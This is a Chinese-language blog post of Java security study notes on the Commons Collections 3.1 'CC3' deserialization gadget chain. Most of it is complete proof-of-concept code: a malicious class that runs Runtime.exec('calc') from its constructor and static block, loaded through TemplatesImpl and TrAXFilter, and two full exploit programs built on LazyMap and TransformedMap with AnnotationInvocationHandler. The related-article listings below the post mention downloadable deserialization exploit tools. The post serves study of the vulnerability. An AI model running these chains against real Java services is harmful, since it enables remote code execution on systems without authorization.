Java安全学习笔记--反序列化漏洞利用链CC3链

最新推荐文章于 2024-06-04 13:46:00 发布
最新推荐文章于 2024-06-04 13:46:00 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: Java安全 文章标签: java 安全 开发语言 网络安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64685672/article/details/122587213
版权

测试环境

jdk1.7(jdk7u80)

Commons Collections3.1

CC3链大体上是CC1和CC2链的结合,利用链核心原理基于CC2链的(动态字节码注入恶意类),使用TransformedMap和lazyMap配合cc1的annotationinvocation类触发newTransformer方法,所以CC3链不适用jdk1.8。

恶意类

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;


public class evilClass extends AbstractTranslet{
    //需要继承AbstractTranslet,因为在defineTransletClasses中会判断是否继承了这个类没有会报错
    public evilClass() {
        super();
        try {
            Runtime.getRuntime().exec("calc");
        }catch (Exception e){
            e.printStackTrace();
        }
    }
    //两种触发方式构造方法和静态代码块
    static {
        try {
            Runtime.getRuntime().exec("calc.exe");
        } catch (IOException e) {
            e.printStackTrace();
        }}


    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }


}

利用链核心

   ClassPool classPool= ClassPool.getDefault();
        CtClass ctClass=classPool.getCtClass("com.test.evilClass");
        byte[] bytes=ctClass.toBytecode();
        //将恶意类转换为字节码
        TemplatesImpl templatesImpl = new TemplatesImpl();
        Field field1=templatesImpl.getClass().getDeclaredField("_name");
        Field field2=templatesImpl.getClass().getDeclaredField("_bytecodes");
        field1.setAccessible(true);
        field2.setAccessible(true);
        field1.set(templatesImpl,"evilClass");
        field2.set(templatesImpl,new byte[][]{bytes});
        //通过反射将bytes和一个name赋值给TemplatesImpl的_name和_bytecodes
        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl})
        };
        Transformer chainedTransformer=new ChainedTransformer(transformers);

使用了一个新的类InstantiateTransformer类,这个类的transform(Object input)会触发input的newInstance()既实例化。

public T transform(Class<? extends T> input) {
        try {
            if (input == null) {
                throw new FunctorException("InstantiateTransformer: Input object was not an instanceof Class, it was a null object");
            } else {
                Constructor<? extends T> con = input.getConstructor(this.iParamTypes);
                return con.newInstance(this.iArgs);
            }
。。。省略
}

这里的input为TrAXFilter类,它的构造方法方法中会触发newTransformer方法

编写POC

基于LazyMap

package com.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.*;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;


import javax.xml.transform.Templates;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class CC3poc2 {
    public static void main(String[] args) throws NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
        ClassPool classPool = ClassPool.getDefault();
        CtClass ctClass = classPool.getCtClass("com.test.evilClass");
        byte[] bytes = ctClass.toBytecode();
        //将恶意类转换为字节码
        TemplatesImpl templates=new TemplatesImpl();
        //可以直接new不需要像AnnotationInvocationHandler一样必须通过反射(类修饰符不同)
        Class classInstance=templates.getClass();
        Field field1=classInstance.getDeclaredField("_name");
        Field field2=classInstance.getDeclaredField("_bytecodes");
        field1.setAccessible(true);
        field2.setAccessible(true);
        field1.set(templates,"evilCLass");
        field2.set(templates,new byte[][]{bytes});
        //反射设置属性
        Transformer[] transFormers=new Transformer[]{
          new ConstantTransformer(TrAXFilter.class),
          new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };
        Transformer chainedTransformer=new ChainedTransformer(transFormers);
        InvokerTransformer transformer=new InvokerTransformer("newTransformer",null,null);
        Map map =new HashMap();
        Map lazyMap= LazyMap.decorate(map,chainedTransformer);
        //在commoncellection3中使用LazyMap.decorate(map,chainedTransformer);
        classInstance =Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor=classInstance.getDeclaredConstructor(Class.class,Map.class);
        constructor.setAccessible(true);
        InvocationHandler invocationHandler=(InvocationHandler)constructor.newInstance(Target.class,lazyMap);
        Map proxyMap= (Map) Proxy.newProxyInstance(Map.class.getClassLoader(),lazyMap.getClass().getInterfaces(),invocationHandler);
        //生成代理类
        InvocationHandler annotationinvocationHandler=(InvocationHandler)constructor.newInstance(Target.class,proxyMap);
        //将代理类传入

        ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream=new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(annotationinvocationHandler);
        objectOutputStream.close();
        //序列化
        ByteArrayInputStream byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream objectInputStream=new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();


    }
}

基于TransformedMap

package com.test;


import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class CC3Poc {
    public static void main(String[] args) throws NotFoundException, IOException, CannotCompileException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException {
        ClassPool classPool= ClassPool.getDefault();
        CtClass ctClass=classPool.getCtClass("com.test.evilClass");
        byte[] bytes=ctClass.toBytecode();
        //将恶意类转换为字节码
        TemplatesImpl templatesImpl = new TemplatesImpl();
        Field field1=templatesImpl.getClass().getDeclaredField("_name");
        Field field2=templatesImpl.getClass().getDeclaredField("_bytecodes");
        field1.setAccessible(true);
        field2.setAccessible(true);
        field1.set(templatesImpl,"evilClass");
        field2.set(templatesImpl,new byte[][]{bytes});
        //通过反射将bytes和一个name赋值给TemplatesImpl的_name和_bytecodes
        Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl})
        };
        Transformer chainedTransformer=new ChainedTransformer(transformers);
        //构造触发newTransform()的利用链,InstantiateTransformer的transform()会将TrAXFilter实例化传入template,触发在构造方法中的newTransform方法
        HashMap map=new HashMap();
        map.put("value","asd");
        Map transformedMap=TransformedMap.decorate(map,null,chainedTransformer);
        Class classInstance=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor=classInstance.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler annotationinvocationHandler=(InvocationHandler) constructor.newInstance(Target.class,transformedMap);
        //反射调用
        ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream=new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(annotationinvocationHandler);
        objectOutputStream.close();
        //序列化
        ByteArrayInputStream byteArrayInputStream=new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream objectInputStream=new ObjectInputStream(byteArrayInputStream);
        objectInputStream.readObject();



    }
}

 

m0v0
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3346
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
java反序列化漏洞-验证.rar
06-25
java反序列化漏洞-验证jar
Java反序列化漏洞利用工具.zip
04-10
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
InvokerTransformer被ban后的另一种利用方法CC3
luoxiayan的博客
09-16 45
在CC1和CC6中,我们最终弹计算器都是通过Runtime.exec进行调用,从CC3我们要介绍一种不通过Runtime来弹计算器的方法,也就是Java中常提到的动态类加载,动态类加载可以让我们通过一个路径来加载一个恶意类,如果这个恶意类在静态代码块或构造代码块中写入了恶意方法,那么我们就可以通过找一条子来初始化这个类(一般在进行实例化时会对类进行初始化),从而达到代码块中的代码执行。//这里是mac弹计算器的命令。
告别脚本小子系列丨JAVA安全(8)——反序列化利用(下)
C20220511的博客
06-26 660
java.lang.ClassLoader是java中负责类加载的抽象类,类中包含一个特别重要的方法defineClass,defineClass方法接受一组字节,然后将其具体化为一个Class类型实例,它一般从磁盘上加载一个文件,然后将文件的字节传递给JVM,通过JVM(native 方法)对于Class的定义,将其具体化,实例化为一个Class类型实例。在前面的文章中介绍了基于CC反序列化利用方式,并且通过最终调用Runtime类的exec方法达到命令执行的效果。
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 930
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用。上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
Java安全反序列化-CC3反序列化漏洞POP分析_ysoserial CommonsCollections3 PoC分析
Ho1aAs‘s Blog
03-11 781
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()2. InstantiateTransformer.transform()调用指定对象的指定类构造器3. LazyMap.get()调用this.factory.transform()构造ChainedTransformer生成lazyMap4. Proxy动态代理+AnnotationInvokerHandler调用LazyMap.get()5. Ann
java反序列化cc3分析
m0_64815693的博客
05-05 1448
java反序列化cc3分析
ysoserial-cc3 java反序列化
springgold的博客
09-02 196
yso-cc3 1.从入口看 1)cc1与2的 结合 2)Transformer如下,使用了TrAXFilter类 final Transformer[] transformers = new Transformer[] { new ConstantTransformer(TrAXFilter.class), new InstantiateTransformer( new Class[] { Templates.class }, new Object[] {
CC3分析与复现
weixin_42974824的博客
08-23 1152
CC3分析与复现
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
deserialize-test:反序列化漏洞学习记录
05-01
deserialize-test 反序列化漏洞学习记录
commons-collections3(cc3)反序列化分析
遇事不决冲冲冲
03-10 2447
commons-collections3反序列化 cc3和cc1想法还是很相似的,然后构造恶意类和调用使用了不同的两个新类 ObjectInputStream.readObject() AnnotationInvocationHandler.readObject() Map(Proxy).entrySet() AnnotationInvocationHandler.invoke()
Java安全--CC3
qq_64201116的博客
12-11 972
如图所示的defineClass在寻找用法时有一个com.sun.org.apache.xalan.internal.xsltc.trax包下面调用了这个重载方法,并且类型的default。这里判断完byte之后对_tfactory进行了方法的调用,所以这里需要对_tfactory进行赋值,否则这里会报空指针报错。是一个transient类型,值为空的东西。发现报错了,还是报了空指针的错误。我们调试发现报错的点在_auxClasses调用put这里,因为_auxClasses为空,所以报了空指针错误。
Java反序列化 CC3 TransformedMap利用与LazyMap利用记录
LTianHang的博客
02-07 144
Java反序列化 CC3 TransformedMap利用与LazyMap利用记录
CommonsCollections CC3
jy13172的博客
07-22 124
java反序列化
10-java安全——java反序列化CC3和CC4分析
网络安全
07-20 1884
漏洞分析环境: JDK1.7.0_80 apache commons collections-3.0 在maven项目中的pom文件中添加3.1版本的依赖 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version
java环境部署
最新发布
JiuMeilove的博客
06-04 412
如果你电脑已经下载了 jdk ,那你可以跳过这一步了我这里下载的是java21 你们可以选择自己需要下载的游览进去的页面是这样子的(相比以前这个页面发生很大变化了),可以看见目前 jdk 已经发行到 17 了,jdk 它又分了三个个操作系统,一个是 Linux、一个是 macOS、以及 windows,如果你是在 windows 操作系统上,那当然就下载 windows 对应的 jdk,其次的话就是还会区分你操作系统的处理器是 32 位的还是 64 位的,可以点击 我的电脑 - 属性 查看。
致远M3Server-xxxx反序列化漏洞
08-16
您好!针对致远M3Server的反序列化漏洞,可以提供一些相关的信息给您: 致远M3Server是一款常见的企业级办公协同软件,该软件存在一个反序列化漏洞,可能导致远程攻击者执行任意代码,并且以系统权限运行。这个漏洞被命名为“致远M3Server反序列化漏洞”。 该漏洞是由于致远M3Server在处理用户提交的数据时,未正确验证和过滤用户输入,导致攻击者可以构造恶意的序列化数据进行攻击。通过利用该漏洞,攻击者可以在服务器上执行任意代码或获取敏感信息。 为了解决此漏洞,建议用户及时更新致远M3Server到最新版本,并密切关注厂商发布的安全公告。此外,还可以考虑限制对M3Server的访问,并采取其他安全措施,如网络分段、强密码策略、访问控制等。 请注意,以上信息仅供参考。对于具体的漏洞修复和安全措施,请参考厂商的官方公告和建议。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值